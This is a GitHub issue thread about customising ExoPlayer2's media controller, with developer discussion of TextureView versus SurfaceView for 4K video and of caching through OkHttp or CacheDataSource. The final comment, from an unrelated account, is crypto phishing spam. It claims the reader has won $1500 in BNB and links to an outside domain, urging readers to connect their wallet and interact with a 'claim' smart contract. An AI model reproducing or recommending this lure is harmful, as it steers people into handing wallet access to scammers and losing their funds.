### ISSUE TITLE
Customizing the MediaController

### ISSUE THREAD

**Issue by PrathameshKesarkar** [YounMario/ExoPlayer2Demo#1]
I want to add more functionality to the available MediaController Provided by ExoPlayer2 so do I need to rewrite the SimpleExoplayerView and PlackbackControlView to customise it more

**Comment by YounMario** [comment]
@PrathameshKesarkar You can custom your own view and controller  with out extend them.  SimpleExoplayerView just offer a playable view . you can use TextureView instead of it . and ExoPlayer has offered some callback. you can set ExoPlayer.EventListener to exoplayer to get playstate such as ExoPlayer.STATE_READY . but exoplayer didn't offered progress callback . I will write it later

**Comment by PrathameshKesarkar** [comment]
@YounMario I checked your wrapper it working awesome However there is a problem in 4k playback i am trying to find the problem but I can't find where exactly it is . The problem is the video stops playing after sometime in 4k if I find a solution i will make changes in the project and inform you thanks for writing in

**Comment by YounMario** [comment]
@PrathameshKesarkar  I add ListView to display video . you can check out . still a lot of things to do :<

**Comment by PrathameshKesarkar** [comment]
@YounMario  TextureView has issue if you are playing 4k video . The video stops after some time but the audio keeps going instead I would prefer using SurfaceVIew cause if you run the same video using SurfaceView there is no jank while playing . The only problem with SurfaceView is animation. For that I had figured out a way which is putting SurfaceView in FrameLayout. and changing the AspectRatio of FrameLayout that seem to be much better option right now.

**Comment by PrathameshKesarkar** [comment]
@YounMario  if you are using Scrollable Content to display video than your best bet is TextureView

**Comment by PrathameshKesarkar** [comment]
Also you need to give PlayerActivity access to SimpleExoPlayer if you want ppl to add MediaControllercause most of the callback lies there

**Comment by YounMario** [comment]
@PrathameshKesarkar thanks for figure out these problems . I will test  4k video later . and about SurfaceView animation that is best way I know too.

**Comment by PrathameshKesarkar** [comment]
Bro can you tell me why using SurfaceView in the sample isn't displaying anything I can't see anything but the Audio is playing fine

**Comment by YounMario** [comment]
@PrathameshKesarkar  um .. i will see later . i guess you created player before surface holder avalible

**Comment by YounMario** [comment]
@PrathameshKesarkar  hi man . here is SurfaceView sample . checkout new code . have nice day :)

**Comment by PrathameshKesarkar** [comment]
@YounMario  I already got someone basic SurfaceView Implementation Thanks dude . One more question dude why did you use OKHTTP for Caching and not use CacheDataSource

**Comment by YounMario** [comment]
@PrathameshKesarkar  before I knew CacheDataSource I did cache feature by intercept response in okhttp client . in my new code i have used CacheDataSource in CacheOkHttpDataSourceFactory (It's can also replace by other implements of DataSource.Factory) . but I still don't know all about it .

**Comment by PrathameshKesarkar** [comment]
You are right the current cache implementation is not sufficient enough to store offline.

**Comment by PrathameshKesarkar** [comment]
Let me first fix the PlayBackControl issue . However how much custom cache size video do you allow

**Comment by YounMario** [comment]
I give the as large as Integer.Max value to cache constructor in demo .  I wanna do offline cache too . so if u find some good solution tell me  thanks bro .

**Comment by PrathameshKesarkar** [comment]
Is your Video Controller Working Cause I guess you need to implement MediaPlayControl to make it work Btw Nice architecture bro

**Comment by YounMario** [comment]
@PrathameshKesarkar  nice suggestion . I wil consider later .

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
